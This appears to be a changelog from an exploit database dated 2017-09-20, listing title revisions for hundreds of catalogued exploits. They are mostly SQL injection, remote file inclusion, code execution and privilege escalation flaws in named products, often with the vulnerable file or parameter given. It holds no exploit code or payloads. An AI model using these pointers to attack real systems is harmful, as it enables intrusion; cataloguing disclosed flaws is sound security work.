DB: 2017-09-20
8 new exploits
McAfee E-Business Server 8.5.2 - Remote Unauthenticated Code Execution / Denial of Service (PoC)
McAfee E-Business Server 8.5.2 - Unauthenticated Remote Code Execution / Denial of Service (PoC)
Apple macOS - Local Privilege Escalation Due to Lack of Bounds Checking in HIServices Custom CFObject Serialization
Apple macOS - Privilege Escalation Due to Lack of Bounds Checking in HIServices Custom CFObject Serialization
Microsoft Edge 38.14393.1066.0 - Memory Corruption with Partial Page Loading
Microsoft Edge 38.14393.1066.0 - 'COptionsCollectionCacheItem::GetAt' Out-of-Bounds Read
Xcode OpenBase 9.1.5 (OSX) - (root file create) Privilege Escalation
Xcode OpenBase 9.1.5 (OSX) - (Root File Create) Privilege Escalation
Xcode OpenBase 10.0.0 (OSX) - (unsafe system call) Privilege Escalation
Xcode OpenBase 10.0.0 (OSX) - (Unsafe System Call) Privilege Escalation
eTrust AntiVirus Agent r8 - Local Privilege Escalation
eTrust AntiVirus Agent r8 - Privilege Escalation
WICD 1.7.1 - Local Privilege Escalation
WICD 1.7.1 - Privilege Escalation
Novell Client 4.91 SP4 - Local Privilege Escalation
Novell Client 4.91 SP4 - Privilege Escalation
H-Sphere Webshell 2.4 - Privilege Escalation
H-Sphere WebShell 2.4 - Privilege Escalation
Zend Platform 2.2.1 - PHP.INI File Modification
Zend Platform 2.2.1 - 'PHP.INI' File Modification
AIX 7.1 - lquerylv Privilege Escalation
AIX 7.1 - 'lquerylv' Privilege Escalation
sheed AntiVirus 2.3 - Unquoted Service Path Privilege Escalation
Sheed AntiVirus 2.3 - Unquoted Service Path Privilege Escalation
Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation
Serviio PRO 1.8 DLNA Media Streaming Server - Privilege Escalation
Automated Logic WebCTRL 6.5 - Local Privilege Escalation
Automated Logic WebCTRL 6.5 - Privilege Escalation
Netdecision 5.8.2 - Local Privilege Escalation
Netdecision 5.8.2 - Privilege Escalation
H-Sphere Webshell 2.4 - Remote Command Execution
H-Sphere WebShell 2.4 - Remote Command Execution
NetIQ Privileged User Manager 2.3.1 - 'ldapagnt_eval()' Remote Perl Code Execution (Metasploit)
NetIQ Privileged User Manager 2.3.1 - 'ldapagnt_eval()' Perl Remote Code Execution (Metasploit)
STUNSHELL Web Shell - Remote PHP Code Execution (Metasploit)
STUNSHELL Web Shell - PHP Remote Code Execution (Metasploit)
v0pCr3w Web Shell - Remote Code Execution (Metasploit)
v0pCr3w (Web Shell) - Remote Code Execution (Metasploit)
InstantCMS 1.6 - Remote PHP Code Execution (Metasploit)
InstantCMS 1.6 - PHP Remote Code Execution (Metasploit)
Drupal Module RESTWS 7.x - Remote PHP Code Execution (Metasploit)
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)
HPE < 7.2 - Java Deserialization
Tecnovision DLX Spot - SSH Backdoor
phpBB 2.0.15 - (highlight) Remote PHP Code Execution
phpBB 2.0.15 - 'highlight' PHP Remote Code Execution
phpBB 2.0.15 - Remote PHP Code Execution (Metasploit)
phpBB 2.0.15 - PHP Remote Code Execution (Metasploit)
versatileBulletinBoard 1.00 RC2 - (board takeover) SQL Injection
versatileBulletinBoard 1.00 RC2 - 'board takeover' SQL Injection
VuBB Forum RC1 - (m) SQL Injection
VuBB Forum RC1 - 'm' SQL Injection
Wizz Forum 1.20 - (TopicID) SQL Injection
PHPWebThings 1.4 - (msg/forum) SQL Injection
Wizz Forum 1.20 - 'TopicID' SQL Injection
PHPWebThings 1.4 - 'msg'/'forum' SQL Injection
webSPELL 4.01 - (title_op) SQL Injection
webSPELL 4.01 - 'title_op' SQL Injection
YapBB 1.2 - (cfgIncludeDirectory) Remote Command Execution
YapBB 1.2 - 'cfgIncludeDirectory' Remote Command Execution
TopList 1.3.8 - (phpBB Hack) Remote File Inclusion (1)
Advanced Guestbook 2.4.0 - (phpBB) File Inclusion
TopList 1.3.8 - (phpBB Hack) Remote File Inclusion (2)
Advanced Guestbook 2.4.0 - (phpBB) Remote File Inclusion
TopList 1.3.8 - 'phpBB Hack' Remote File Inclusion (1)
Advanced Guestbook 2.4.0 - 'phpBB' File Inclusion
TopList 1.3.8 - 'phpBB Hack' Remote File Inclusion (2)
Advanced Guestbook 2.4.0 - 'phpBB' Remote File Inclusion
Knowledge Base Mod 2.0.2 - (phpBB) Remote File Inclusion
Knowledge Base Mod 2.0.2 - 'phpBB' Remote File Inclusion
phpRaid 3.0.b3 - (phpBB/SMF) Remote File Inclusion
pafileDB 2.0.1 - (mxBB/phpBB) Remote File Inclusion
phpRaid 3.0.b3 - 'phpBB'/'SMF' Remote File Inclusion
pafileDB 2.0.1 - 'mxBB'/'phpBB' Remote File Inclusion
Foing 0.7.0 - (phpBB) Remote File Inclusion
Foing 0.7.0 - 'phpBB' Remote File Inclusion
Activity MOD Plus 1.1.0 - (phpBB Mod) File Inclusion
Activity MOD Plus 1.1.0 - 'phpBB Mod' File Inclusion
Blend Portal 1.2.0 - (phpBB Mod) Remote File Inclusion
Blend Portal 1.2.0 - 'phpBB Mod' Remote File Inclusion
XMB 1.9.6 - (u2uid) SQL Injection (mq=off)
XMB 1.9.6 - (mq=off) 'u2uid' SQL Injection
Web3news 0.95 - (PHPSECURITYADMIN_PATH) Remote File Inclusion
Web3news 0.95 - 'PHPSECURITYADMIN_PATH' Remote File Inclusion
Yappa-ng 2.3.1 - (admin_modules) Remote File Inclusion
Yappa-ng 2.3.1 - 'admin_modules' Remote File Inclusion
TualBLOG 1.0 - (icerikno) SQL Injection
TualBLOG 1.0 - 'icerikno' SQL Injection
Tekman Portal 1.0 - (tr) SQL Injection
Tekman Portal 1.0 - 'tr' SQL Injection
MyReview 1.9.4 - (email) SQL Injection / Code Execution
MyReview 1.9.4 - 'email' SQL Injection / Code Execution
phpQuestionnaire 3.12 - (phpQRootDir) Remote File Inclusion
phpQuestionnaire 3.12 - 'phpQRootDir' Remote File Inclusion
phpBB Static Topics 1.0 - phpbb_root_path File Inclusion
phpBB Static Topics 1.0 - 'phpbb_root_path' File Inclusion
CentiPaid 1.4.2 - centipaid_class.php Remote File Inclusion
CentiPaid 1.4.2 - 'centipaid_class.php' Remote File Inclusion
webSPELL 4.01.01 - (getsquad) SQL Injection
webSPELL 4.01.01 - 'getsquad' SQL Injection
Osprey 1.0 - GetRecord.php Remote File Inclusion
Osprey 1.0 - 'GetRecord.php' Remote File Inclusion
Techno Dreams Announcement - (key) SQL Injection
Techno Dreams Guestbook 1.0 - (key) SQL Injection
Techno Dreams Announcement - 'key' SQL Injection
Techno Dreams Guestbook 1.0 - 'key' SQL Injection
GEPI 1.4.0 - gestion/savebackup.php Remote File Inclusion
GEPI 1.4.0 - 'gestion/savebackup.php' Remote File Inclusion
PHPGiggle 12.08 - (CFG_PHPGIGGLE_ROOT) File Inclusion
PHPGiggle 12.08 - 'CFG_PHPGIGGLE_ROOT' File Inclusion
mxBB Module Meeting 1.1.2 - Remote FileInclusion
mxBB Module Meeting 1.1.2 - Remote File Inclusion
Uploader & Downloader 3.0 - (id_user) SQL Injection
Uploader & Downloader 3.0 - 'id_user' SQL Injection
The Classified Ad System 1.0 - (main) SQL Injection
The Classified Ad System 1.0 - 'main' SQL Injection
VisoHotlink 1.01 - functions.visohotlink.php Remote File Inclusion
VisoHotlink 1.01 - 'functions.visohotlink.php' Remote File Inclusion
vhostadmin 0.1 - (MODULES_DIR) Remote File Inclusion
vhostadmin 0.1 - 'MODULES_DIR' Remote File Inclusion
XLAtunes 0.1 - (album) SQL Injection
XLAtunes 0.1 - 'album' SQL Injection
webSPELL 4.01.02 - (topic) SQL Injection
webSPELL 4.01.02 - 'topic' SQL Injection
webSPELL 4.01.02 - Remote PHP Code Execution
webSPELL 4.01.02 - PHP Remote Code Execution
PHP-Nuke - iFrame (iframe.php) Remote File Inclusion
PHP-Nuke - 'iframe.php' Remote File Inclusion
XOOPS Module Camportail 1.1 - (camid) SQL Injection
XOOPS Module Camportail 1.1 - 'camid' SQL Injection
Mutant 0.9.2 - mutant_functions.php Remote File Inclusion
Mutant 0.9.2 - 'mutant_functions.php' Remote File Inclusion
Original 0.11 - config.inc.php x[1] Remote File Inclusion
Original 0.11 - 'config.inc.php' 'x[1]' Remote File Inclusion
Glossword 1.8.1 - custom_vars.php Remote File Inclusion
Glossword 1.8.1 - 'custom_vars.php' Remote File Inclusion
GeekLog 2.x - ImageImageMagick.php Remote File Inclusion
GeekLog 2.x - 'ImageImageMagick.php' Remote File Inclusion
Vizayn Urun Tanitim Sistemi 0.2 - (tr) SQL Injection
Vizayn Urun Tanitim Sistemi 0.2 - 'tr' SQL Injection
WBB2-Addon: Acrotxt 1.0 - (show) SQL Injection
WBB2-Addon: Acrotxt 1.0 - 'show' SQL Injection
STPHPLibrary - (STPHPLIB_DIR) Remote File Inclusion
STPHPLibrary - 'STPHPLIB_DIR' Remote File Inclusion
phpFFL 1.24 - PHPFFL_FILE_ROOT Remote File Inclusion
phpFFL 1.24 - 'PHPFFL_FILE_ROOT' Remote File Inclusion
phpBB Mod OpenID 0.2.0 - BBStore.php Remote File Inclusion
phpBB Mod OpenID 0.2.0 - 'BBStore.php' Remote File Inclusion
LiveAlbum 0.9.0 - common.php Remote File Inclusion
LiveAlbum 0.9.0 - 'common.php' Remote File Inclusion
Pindorama 0.1 - client.php Remote File Inclusion
Pindorama 0.1 - 'client.php' Remote File Inclusion
Socketmail 2.2.8 - fnc-readmail3.php Remote File Inclusion
TOWeLS 0.1 - scripture.php Remote File Inclusion
Socketmail 2.2.8 - 'fnc-readmail3.php' Remote File Inclusion
TOWeLS 0.1 - 'scripture.php' Remote File Inclusion
Sige 0.1 - sige_init.php Remote File Inclusion
Sige 0.1 - 'sige_init.php' Remote File Inclusion
Scribe 0.2 - Remote PHP Code Execution
Scribe 0.2 - PHP Remote Code Execution
patBBcode 1.0 - bbcodeSource.php Remote File Inclusion
patBBcode 1.0 - 'bbcodeSource.php' Remote File Inclusion
Tilde CMS 4.x - (aarstal) SQL Injection
Tilde CMS 4.x - 'aarstal' SQL Injection
CityWriter 0.9.7 - head.php Remote File Inclusion
CityWriter 0.9.7 - 'head.php' Remote File Inclusion
PhpMyDesktop/Arcade 1.0 Final - (phpdns_basedir) Remote File Inclusion
PhpMyDesktop/Arcade 1.0 Final - 'phpdns_basedir' Remote File Inclusion
WebSihirbazi 5.1.1 - (pageid) SQL Injection
WebSihirbazi 5.1.1 - 'pageid' SQL Injection
Blakord Portal Beta 1.3.A - (all modules) SQL Injection
Blakord Portal Beta 1.3.A - (All Modules) SQL Injection
PHP Links 1.3 - smarty.php Remote File Inclusion
PHP Links 1.3 - 'smarty.php' Remote File Inclusion
Aterr 0.9.1 - Local File Inclusion (PHP5)
Aterr 0.9.1 - PHP5 Local File Inclusion
phpEmployment - (PHP upload) Arbitrary File Upload
phpEmployment - 'PHP Upload' Arbitrary File Upload
XOOPS 2.3.2 - 'mydirname' Remote PHP Code Execution
XOOPS 2.3.2 - 'mydirname' PHP Remote Code Execution
Xplode CMS - (wrap_script) SQL Injection
Xplode CMS - 'wrap_script' SQL Injection
VS PANEL 7.3.6 - (Cat_ID) SQL Injection
VS PANEL 7.3.6 - 'Cat_ID' SQL Injection
WebMember 1.0 - (formID) SQL Injection
WebMember 1.0 - 'formID' SQL Injection
Dokuwiki 2009-02-14 - Remote/Temporary File Inclusion
Dokuwiki 2009-02-14 - Temporary/Remote File Inclusion
Kjtechforce mailman b1 - (code) SQL Injection Delete Row
Kjtechforce mailman b1 - (Delete Row) 'code' SQL Injection
Virtue Classifieds - (category) SQL Injection
Virtue Classifieds - 'category' SQL Injection
XOOPS Celepar Module Qas - (codigo) SQL Injection
XOOPS Celepar Module Qas - 'codigo' SQL Injection
URA 3.0 - (cat) SQL Injection
URA 3.0 - 'cat' SQL Injection
TYPO3 CMS 4.0 - (showUid) SQL Injection
TYPO3 CMS 4.0 - 'showUid' SQL Injection
Typing Pal 1.0 - (idTableProduit) SQL Injection
Typing Pal 1.0 - 'idTableProduit' SQL Injection
Videos Broadcast Yourself 2 - (UploadID) SQL Injection
Videos Broadcast Yourself 2 - 'UploadID' SQL Injection
Uiga Church Portal - (year) SQL Injection
Uiga Church Portal - 'year' SQL Injection
Network Management/Inventory System - header.php Remote File Inclusion
Network Management/Inventory System - 'header.php' Remote File Inclusion
BASE 1.2.4 - base_qry_common.php Remote File Inclusion (Metasploit)
BASE 1.2.4 - 'base_qry_common.php' Remote File Inclusion (Metasploit)
PHP-Nuke 8.0 - ' News Module Cross-Site Scripting / HTML Code Injection
PHP-Nuke 8.0 - (News Module) Cross-Site Scripting / HTML Code Injection
Vivid Ads Shopping Cart - (prodid) SQL Injection
Vivid Ads Shopping Cart - 'prodid' SQL Injection
WorldPay Script Shop - (productdetail) SQL Injection
WorldPay Script Shop - 'productdetail' SQL Injection
tincan ltd - (section) SQL Injection
tincan ltd - 'section' SQL Injection
Template Seller Pro 3.25 - (tempid) SQL Injection
Template Seller Pro 3.25 - 'tempid' SQL Injection
Webloader 7 < 8 - (vid) SQL Injection
Webloader 7 < 8 - 'vid' SQL Injection
web5000 - (page_show) SQL Injection
web5000 - 'page_show' SQL Injection
Cosmos Solutions CMS - (id= / page=) SQL Injection
Cosmos Solutions CMS - 'id=' / 'page=' SQL Injection
iBoutique - (page) SQL Injection / Cross-Site Scripting
iBoutique - 'page' SQL Injection / Cross-Site Scripting
OpenX - (phpAdsNew) Remote File Inclusion
OpenX - 'phpAdsNew' Remote File Inclusion
System Shop - (Module aktka) SQL Injection
System Shop - 'Module aktka' SQL Injection
TikiWiki tiki-graph_formula - Remote PHP Code Execution (Metasploit)
TikiWiki tiki-graph_formula - PHP Remote Code Execution (Metasploit)
vBulletin 4.0.x 4.1.3 - (messagegroupid) SQL Injection
vBulletin 4.0.x 4.1.3 - 'messagegroupid' SQL Injection
PmWiki 2.2.34 - (pagelist) Remote PHP Code Injection (1)
PmWiki 2.2.34 - 'pagelist' Remote PHP Code Injection (1)
YABB SE 0.8/1.4/1.5 - Packages.php Remote File Inclusion
YABB SE 0.8/1.4/1.5 - 'Packages.php' Remote File Inclusion
Invision Board 1.1.1 - ipchat.php Remote File Inclusion
Invision Board 1.1.1 - 'ipchat.php' Remote File Inclusion
Typo3 3.5 b5 - Translations.php Remote File Inclusion
Typo3 3.5 b5 - 'Translations.php' Remote File Inclusion
Webchat 0.77 - Defines.php Remote File Inclusion
Webchat 0.77 - 'Defines.php' Remote File Inclusion
PHP-Nuke 6.5 - Multiple Downloads Module SQL Injection
PHP-Nuke 6.5 - (Multiple Downloads Module) SQL Injection
ttCMS 2.2/2.3 - header.php Remote File Inclusion
ttCMS 2.2/2.3 - 'header.php' Remote File Inclusion
PMachine 2.2.1 - Lib.Inc.php Remote File Inclusion Command Execution
PMachine 2.2.1 - 'Lib.Inc.php' Remote File Inclusion / Command Execution
HolaCMS 1.2.x - HTMLtags.php Local File Inclusion
HolaCMS 1.2.x - 'HTMLtags.php' Local File Inclusion
WebCalendar 0.9.x - Multiple Module SQL Injection
WebCalendar 0.9.x - (Multiple Modules) SQL Injection
PHP-Nuke 6.x - Multiple Module SQL Injection
PHP-Nuke 6.x - (Multiple Modules) SQL Injection
EasyDynamicPages 1.0 - 'config_page.php' Remote PHP File Inclusion
EasyDynamicPages 1.0 - 'config_page.php' PHP Remote File Inclusion
VisualShapers EZContents 1.4/2.0 - module.php Remote Command Execution
VisualShapers EZContents 1.4/2.0 - 'module.php' Remote Command Execution
Mambo Open Source 4.5/4.6 - mod_mainmenu.php Remote File Inclusion
Mambo Open Source 4.5/4.6 - 'mod_mainmenu.php' Remote File Inclusion
PHPGedView 2.x - [GED_File]_conf.php Remote File Inclusion
PHPGedView 2.x - '[GED_File]_conf.php' Remote File Inclusion
Laurent Adda Les Commentaires 2.0 - PHP Script fonctions.lib.php Remote File Inclusion
Laurent Adda Les Commentaires 2.0 - PHP Script derniers_commentaires.php Remote File Inclusion
Laurent Adda Les Commentaires 2.0 - PHP Script admin.php Remote File Inclusion
Laurent Adda Les Commentaires 2.0 - PHP Script 'fonctions.lib.php' Remote File Inclusion
Laurent Adda Les Commentaires 2.0 - PHP Script 'derniers_commentaires.php' Remote File Inclusion
Laurent Adda Les Commentaires 2.0 - PHP Script 'admin.php' Remote File Inclusion
VisualShapers EZContents 1.x/2.0 - db.php Arbitrary File Inclusion
VisualShapers EZContents 1.x/2.0 - archivednews.php Arbitrary File Inclusion
VisualShapers EZContents 1.x/2.0 - 'db.php' Arbitrary File Inclusion
VisualShapers EZContents 1.x/2.0 - 'archivednews.php' Arbitrary File Inclusion
VirtuaSystems VirtuaNews 1.0.x - Multiple Module Cross-Site Scripting Vulnerabilities
VirtuaSystems VirtuaNews 1.0.x - (Multiple Modules) Cross-Site Scripting Vulnerabilities
WarpSpeed 4nAlbum Module 0.92 - displaycategory.php basepath Parameter Remote File Inclusion
WarpSpeed 4nAlbum Module 0.92 - 'displaycategory.php' 'basepath' Parameter Remote File Inclusion
Gemitel 3.50 - affich.php Remote File Inclusion Command Injection
Gemitel 3.50 - 'affich.php' Remote File Inclusion / Command Injection
phpBB 2.0.x - album_portal.php Remote File Inclusion
phpBB 2.0.x - 'album_portal.php' Remote File Inclusion
Mail Manage EX 3.1.8 MMEX - Script Settings Parameter Remote PHP File Inclusion
Mail Manage EX 3.1.8 MMEX - Script Settings Parameter PHP Remote File Inclusion
Nucleus CMS 3.0 / Blog:CMS 3 / PunBB 1.x - Common.php Remote File Inclusion
Nucleus CMS 3.0 / Blog:CMS 3 / PunBB 1.x - 'Common.php' Remote File Inclusion
@lexPHPTeam @lex Guestbook 3.12 - Remote PHP File Inclusion
@lexPHPTeam @lex Guestbook 3.12 - PHP Remote File Inclusion
phpBB 2.0.x - 'admin_cash.php' Remote PHP File Inclusion
phpBB 2.0.x - 'admin_cash.php' PHP Remote File Inclusion
Stadtaus.Com Download Center Lite 1.5 - Remote PHP File Inclusion
Stadtaus.Com Download Center Lite 1.5 - PHP Remote File Inclusion
Work System eCommerce 3.0.3/3.0.4 - forum.php Remote File Inclusion
Work System eCommerce 3.0.3/3.0.4 - 'forum.php' Remote File Inclusion
phpGroupWare 0.9.14 - Tables_Update.Inc.php Remote File Inclusion
phpGroupWare 0.9.14 - 'Tables_Update.Inc.php' Remote File Inclusion
PANews 2.0 - Remote PHP Script Code Execution
PANews 2.0 - PHP Remote Code Execution
VoteBox 2.0 - Votebox.php Remote File Inclusion
VoteBox 2.0 - 'Votebox.php' Remote File Inclusion
McNews 1.x - install.php Arbitrary File Inclusion
McNews 1.x - 'install.php' Arbitrary File Inclusion
Vortex Portal 2.0 - content.php act Parameter Remote File Inclusion
Vortex Portal 2.0 - 'content.php' act Parameter Remote File Inclusion
phpBB 1.x/2.0.x - Knowledge Base Module KB.php SQL Injection
phpBB 1.x/2.0.x - (Knowledge Base Module) 'KB.php' SQL Injection
GrayCMS 1.1 - error.php Remote File Inclusion
GrayCMS 1.1 - 'error.php' Remote File Inclusion
PHP Poll Creator 1.0.1 - Poll_Vote.php Remote File Inclusion
PHP Poll Creator 1.0.1 - 'Poll_Vote.php' Remote File Inclusion
MWChat 6.7 - Start_Lobby.php Remote File Inclusion
MWChat 6.7 - 'Start_Lobby.php' Remote File Inclusion
Popper Webmail 1.41 - ChildWindow.Inc.php Remote File Inclusion
Popper Webmail 1.41 - 'ChildWindow.Inc.php' Remote File Inclusion
RaXnet Cacti 0.5/0.6/0.8 - Config_Settings.php Remote File Inclusion
RaXnet Cacti 0.5/0.6/0.8 - 'Config_Settings.php' Remote File Inclusion
RaXnet Cacti 0.5/0.6/0.8 - Top_Graph_Header.php Remote File Inclusion
RaXnet Cacti 0.5/0.6/0.8 - 'Top_Graph_Header.php' Remote File Inclusion
MyGuestbook 0.6.1 - Form.Inc.php3 Remote File Inclusion
MyGuestbook 0.6.1 - 'Form.Inc.php3' Remote File Inclusion
Comdev eCommerce 3.0 - config.php Remote File Inclusion
Comdev eCommerce 3.0 - 'config.php' Remote File Inclusion
PHPWebNotes 2.0 - Api.php Remote File Inclusion
PHPWebNotes 2.0 - 'Api.php' Remote File Inclusion
Autolinks 2.1 Pro - Al_initialize.php Remote File Inclusion
Autolinks 2.1 Pro - 'Al_initialize.php' Remote File Inclusion
MySource 2.14 - Socket.php PEAR_PATH Remote File Inclusion
MySource 2.14 - Request.php PEAR_PATH Remote File Inclusion
MySource 2.14 - 'Socket.php' 'PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'Request.php' 'PEAR_PATH' Remote File Inclusion
MySource 2.14 - mail.php PEAR_PATH Remote File Inclusion
MySource 2.14 - Date.php PEAR_PATH Remote File Inclusion
MySource 2.14 - Span.php PEAR_PATH Remote File Inclusion
MySource 2.14 - mimeDecode.php PEAR_PATH Remote File Inclusion
MySource 2.14 - mime.php PEAR_PATH Remote File Inclusion
MySource 2.14 - 'mail.php' 'PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'Date.php' 'PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'Span.php' 'PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'mimeDecode.php' 'PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'mime.php' 'PEAR_PATH' Remote File Inclusion
Help Center Live 1.0/1.2/2.0 - module.php Local File Inclusion
Help Center Live 1.0/1.2/2.0 - 'module.php' Local File Inclusion
Tru-Zone Nuke ET 3.x - Search Module SQL Injection
Tru-Zone Nuke ET 3.x - (Search Module) SQL Injection
vtiger CRM 4.2 - RSS Aggregation Module Feed Cross-Site Scripting
vtiger CRM 4.2 - (RSS Aggregation Module Feed) Cross-Site Scripting
CF_Nuke 4.6 - index.cfm Local File Inclusion
CF_Nuke 4.6 - 'index.cfm' Local File Inclusion
Tolva 0.1 - Usermods.php Remote File Inclusion
Tolva 0.1 - 'Usermods.php' Remote File Inclusion
SPiD 1.3.1 - Scan_Lang_Insert.php Local File Inclusion
SPiD 1.3.1 - 'Scan_Lang_Insert.php' Local File Inclusion
PHORUM 3.x/5.x - Common.php Remote File Inclusion
PHORUM 3.x/5.x - 'Common.php' Remote File Inclusion
SPIP 1.8.3 - Spip_login.php Remote File Inclusion
SPIP 1.8.3 - 'Spip_login.php' Remote File Inclusion
CyBoards PHP Lite 1.21/1.25 - Common.php Remote File Inclusion
CyBoards PHP Lite 1.21/1.25 - 'Common.php' Remote File Inclusion
Monster Top List 1.4 - functions.php Remote File Inclusion
Monster Top List 1.4 - 'functions.php' Remote File Inclusion
I-RATER Platinum - Common.php Remote File Inclusion
I-RATER Platinum - 'Common.php' Remote File Inclusion
I-RATER Platinum - Config_settings.TPL.php Remote File Inclusion
I-RATER Platinum - 'Config_settings.TPL.php' Remote File Inclusion
Advanced Guestbook 2.x - Addentry.php Remote File Inclusion
Advanced Guestbook 2.x - 'Addentry.php' Remote File Inclusion
DMCounter 0.9.2 -b - Kopf.php Remote File Inclusion
phpBB Knowledge Base 2.0.2 - Mod KB_constants.php Remote File Inclusion
DMCounter 0.9.2 -b - 'Kopf.php' Remote File Inclusion
phpBB Knowledge Base 2.0.2 - 'Mod KB_constants.php' Remote File Inclusion
ISPConfig 2.2.2/2.2.3 - Session.INC.php Remote File Inclusion
ISPConfig 2.2.2/2.2.3 - 'Session.INC.php' Remote File Inclusion
RadScripts RadLance 7.0 - popup.php Local File Inclusion
RadScripts RadLance 7.0 - 'popup.php' Local File Inclusion
osTicket 1.x - Open_form.php Remote File Inclusion
osTicket 1.x - 'Open_form.php' Remote File Inclusion
Squirrelmail 1.4.x - Redirect.php Local File Inclusion
Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
phpBB 2.0.x - template.php Remote File Inclusion
phpBB 2.0.x - 'template.php' Remote File Inclusion
phpBB - BBRSS.php Remote File Inclusion
phpBB - 'BBRSS.php' Remote File Inclusion
eNpaper1 - Root_Header.php Remote File Inclusion
eNpaper1 - 'Root_Header.php' Remote File Inclusion
CrisoftRicette 1.0 - Cookbook.php Remote File Inclusion
CrisoftRicette 1.0 - 'Cookbook.php' Remote File Inclusion
MF Piadas 1.0 - admin.php Remote File Inclusion
MF Piadas 1.0 - 'admin.php' Remote File Inclusion
SiteBuilder-FX - top.php Remote File Inclusion
SiteBuilder-FX - 'top.php' Remote File Inclusion
Blog:CMS 4.1 - Thumb.php Remote File Inclusion
Blog:CMS 4.1 - 'Thumb.php' Remote File Inclusion
Extcalendar 2.0 - Extcalendar.php Remote File Inclusion
Extcalendar 2.0 - 'Extcalendar.php' Remote File Inclusion
RW::Download - stats.php Remote File Inclusion
RW::Download - 'stats.php' Remote File Inclusion
PHP Event Calendar 1.4 - calendar.php Remote File Inclusion
PHP Event Calendar 1.4 - 'calendar.php' Remote File Inclusion
Forum 5 - pm.php Local File Inclusion
Forum 5 - 'pm.php' Local File Inclusion
Advanced Poll 2.0.2 - common.inc.php Remote File Inclusion
Advanced Poll 2.0.2 - 'common.inc.php' Remote File Inclusion
Prince Clan Chess Club 0.8 - Include.PCchess.php Remote File Inclusion
Prince Clan Chess Club 0.8 - 'Include.PCchess.php' Remote File Inclusion
Bosdates 3.x/4.0 - Payment.php Remote File Inclusion
Bosdates 3.x/4.0 - 'Payment.php' Remote File Inclusion
Moskool 1.5 Component - Admin.Moskool.php Remote File Inclusion
Moskool 1.5 Component - 'Admin.Moskool.php' Remote File Inclusion
WoW Roster 1.5 - hsList.php subdir Parameter Remote File Inclusion
WoW Roster 1.5 - 'hsList.php' 'subdir' Parameter Remote File Inclusion
VWar 1.5 - war.php vwar_root Parameter Remote File Inclusion
VWar 1.5 - member.php vwar_root Parameter Remote File Inclusion
VWar 1.5 - calendar.php vwar_root Parameter Remote File Inclusion
VWar 1.5 - challenge.php vwar_root Parameter Remote File Inclusion
VWar 1.5 - joinus.php vwar_root Parameter Remote File Inclusion
VWar 1.5 - news.php vwar_root Parameter Remote File Inclusion
VWar 1.5 - stats.php vwar_root Parameter Remote File Inclusion
VWar 1.5 - 'war.php' vwar_root Parameter Remote File Inclusion
VWar 1.5 - 'member.php' vwar_root Parameter Remote File Inclusion
VWar 1.5 - 'calendar.php' vwar_root Parameter Remote File Inclusion
VWar 1.5 - 'challenge.php' vwar_root Parameter Remote File Inclusion
VWar 1.5 - 'joinus.php' vwar_root Parameter Remote File Inclusion
VWar 1.5 - 'news.php' vwar_root Parameter Remote File Inclusion
VWar 1.5 - 'stats.php' vwar_root Parameter Remote File Inclusion
Mafia Moblog 6 - Big.php Remote File Inclusion
Mafia Moblog 6 - 'Big.php' Remote File Inclusion
WEBinsta Mailing List Manager 1.3 - Install3.php Remote File Inclusion
WEBinsta Mailing List Manager 1.3 - 'Install3.php' Remote File Inclusion
Zen Cart Web Shopping Cart 1.x - autoload_func.php autoLoadConfig[999][0][loadFile] Parameter Remote File Inclusion
Zen Cart Web Shopping Cart 1.x - 'autoload_func.php' 'autoLoadConfig[999][0][loadFile]' Parameter Remote File Inclusion
Jetbox CMS 2.1 - Search_function.php Remote File Inclusion
Jetbox CMS 2.1 - 'Search_function.php' Remote File Inclusion
In-portal In-Link 2.3.4 - ADODB_DIR.php Remote File Inclusion
In-portal In-Link 2.3.4 - 'ADODB_DIR.php' Remote File Inclusion
PHP-Proxima 6.0 - BB_Smilies.php Local File Inclusion
PHP-Proxima 6.0 - 'BB_Smilies.php' Local File Inclusion
WM-News 0.5 - print.php Local File Inclusion
Ractive Popper 1.41 - Childwindow.Inc.php Remote File Inclusion
WM-News 0.5 - 'print.php' Local File Inclusion
Ractive Popper 1.41 - 'Childwindow.Inc.php' Remote File Inclusion
Exporia 0.3 - Common.php Remote File Inclusion
Exporia 0.3 - 'Common.php' Remote File Inclusion
My-BIC 0.6.5 - Mybic_Server.php Remote File Inclusion
My-BIC 0.6.5 - 'Mybic_Server.php' Remote File Inclusion
Geotarget - script.php Remote File Inclusion
Geotarget - 'script.php' Remote File Inclusion
PHPSelect Web Development - index.php3 Remote File Inclusion
PHPSelect Web Development - 'index.php3' Remote File Inclusion
PHP Web Scripts Easy Banner - functions.php Remote File Inclusion
PHP Web Scripts Easy Banner - 'functions.php' Remote File Inclusion
PHP Polling Creator 1.03 - functions.inc.php Remote File Inclusion
PHP Polling Creator 1.03 - 'functions.inc.php' Remote File Inclusion
Softerra PHP Developer Library 1.5.3 - Grid3.lib.php Remote File Inclusion
BlueShoes Framework 4.6 - GoogleSearch.php Remote File Inclusion
Tagit2b - DelTagUser.php Remote File Inclusion
Softerra PHP Developer Library 1.5.3 - 'Grid3.lib.php' Remote File Inclusion
BlueShoes Framework 4.6 - 'GoogleSearch.php' Remote File Inclusion
Tagit2b - 'DelTagUser.php' Remote File Inclusion
CommunityPortals 1.0 - bug.php Remote File Inclusion
CommunityPortals 1.0 - 'bug.php' Remote File Inclusion
PHP TopSites FREE 1.022b - config.php Remote File Inclusion
PHP TopSites FREE 1.022b - 'config.php' Remote File Inclusion
Buzlas 2006-1 Full - Archive_Topic.php Remote File Inclusion
Buzlas 2006-1 Full - 'Archive_Topic.php' Remote File Inclusion
phpBB Add Name Module - Not_Mem.php Remote File Inclusion
phpBB Add Name Module - 'Not_Mem.php' Remote File Inclusion
RamaCMS - ADODB.Inc.php Remote File Inclusion
H-Sphere Webshell 2.x - 'login.php' Cross-Site Scripting
Mambo Module MOStlyCE 4.5.4 - HTMLTemplate.php Remote File Inclusion
Lodel CMS 0.7.3 - Calcul-page.php Remote File Inclusion
RamaCMS - 'ADODB.Inc.php' Remote File Inclusion
H-Sphere WebShell 2.x - 'login.php' Cross-Site Scripting
Mambo Module MOStlyCE 4.5.4 - 'HTMLTemplate.php' Remote File Inclusion
Lodel CMS 0.7.3 - 'Calcul-page.php' Remote File Inclusion
Maintain 3.0.0-RC2 - Example6.php Remote File Inclusion
